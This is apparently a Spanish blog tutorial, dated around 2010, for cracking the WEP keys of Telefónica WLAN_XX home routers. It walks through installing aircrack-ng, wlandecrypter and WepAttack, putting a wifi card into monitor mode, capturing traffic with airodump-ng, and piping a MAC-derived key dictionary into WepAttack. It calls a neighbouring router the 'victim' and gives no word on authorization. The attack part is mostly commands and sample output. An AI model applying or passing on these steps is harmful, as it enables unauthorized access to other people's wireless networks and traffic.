Hola, en este post voy a poner un tutorial de como crackear o descifrar claves wep de los routers de telefonica del tipo WLAN_XX.
Yo lo he hecho en Ubuntu Karmic Koala (9.10), debería funcionar en cualquier otra versión y distribución.
Primero necesitamos instalar aircrack-ng:
# sudo apt-get install aircrack-ng
Serán necesarias las siguientes librerías para compilar wlandecrypter y wepattack:
# sudo apt-get install zlib1g zlib1g-dev libpcap0.8 libpcap0.8-dev libssl-dev
Nos descargamos el wlandecrypter-1.2.tar.gz desde http://www.wifiway.org/archivos/wlandecrypter-1.2.tar.gz (la version para windows la descargaís desde aquí: http://www.wifiway.org/archivos/wlandecrypter-1.2.zip) o desde el terminal:
# wget -c http://www.wifiway.org/archivos/wlandecrypter-1.2.tar.gz
Ahora nos descargamos WepAttack-0.1.3.tar.gz desde http://heanet.dl.sourceforge.net/sourceforge/wepattack/WepAttack-0.1.3.tar.gz o desde el terminal:
# wget -c http://heanet.dl.sourceforge.net/sourceforge/wepattack/WepAttack-0.1.3.tar.gz
Instalción wlandecrypter desde, el terminal:
Descomprimimos el archivo:
# tar zxvf wlandecrypter-1.2.tar.gz
# cd wlandecryper-1.2/
# sudo make clean
# sudo make
# sudo make install
Instalción wlandecrypter desde, el terminal:
# tar zxvf WepAttack-0.1.3.tar.gz
# cd WepAttack-0.1.3/
# cd src/
# sudo gedit Makefile (ir a la línea 24 y poner un espacio entre: "log.o\" ==> "log.o \")
# sudo make clean
# sudo make
# sudomake install
Poner tarjeta wifi en modo monitor:
Para saber si nuestra tarjeta sirve para capturar paquetes de red, podeís mirar esta lista (buscar mas por google por que puede no estar completa).
Primero miramos cual es nuestro interfaz de red wifi:
# iwconfig
Pues a poner nuestra tarjeta en modo monitor:
# sudo airmon-ng start wlan0
Saldrá lo siguiente:
Interface Chipset Driver
wlan0 Atheros ath5k - [phy1]
[mode monitor enable in mon0]
Dice que nuestra tarjeta va a trabajar en modo monitor bajo el interfaz mon0.
Buscar la red a atacar:
# sudo airodump-ng -w -0 mon0
(-w guarda los paquetes capturados en un archivo en la carpeta en la cual nos encontremos en el terminal, el nombre del archivo por defecto es: -0-0X.cap donde x es 1 e irá ascendiendo según hagamos capturas diferentes, tambien podemos darle un nombre asi: -w captura, quedando así captura-0x.cap).
Saldrán las redes a nuestro alcance, con esta estructura:
CH 1 ][ Elapsed: 4 s ][ 2010-03-09 23:53
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:01:38:A9:02:F7 -72 13 1 0 6 54 . WEP WEP WLAN_D7
00:02:CF:B6:41:E3 -88 3 0 0 4 54 . WEP WEP WLAN_42
00:1A:2B:47:D4:96 -88 3 0 0 3 54 WEP WEP WLAN_0F
00:23:F8:C9:7D:FB -89 3 0 0 9 54 . WEP WEP WLAN_66
00:16:38:CB:EE:1C -93 2 0 0 3 54 WEP WEP WLAN_16
BSSID STATION PWR Rate Lost Packets Probes
00:02:CF:B1:D4:73 00:23:CD:CF:7D:C9 0 0 - 9 0 6
Crackear la clave wep:
Lo que vamos a hacer en realidad es generar en base a la dirección MAC (BSSID) del router-víctima un diccionario de claves, y se lo vamos a pasar al WepAttack para que nos encuentre cuál de ellas es la correcta.
(El que está en amarillo va a ser la victima).
# sudo wlandecrypter 00:01:38:A9:02:F7 WLAN_D7 | wepattack -f -0-01.cap
Donde la mac es la del router-victima, y su ESSID (WLAN_D7).
Y si todo resulta bien:
Pongo un enlace a un video ilustrativo, http://www.youtube.com/watch?v=czv7kBfTN6A.
No hay comentarios:
Publicar un comentario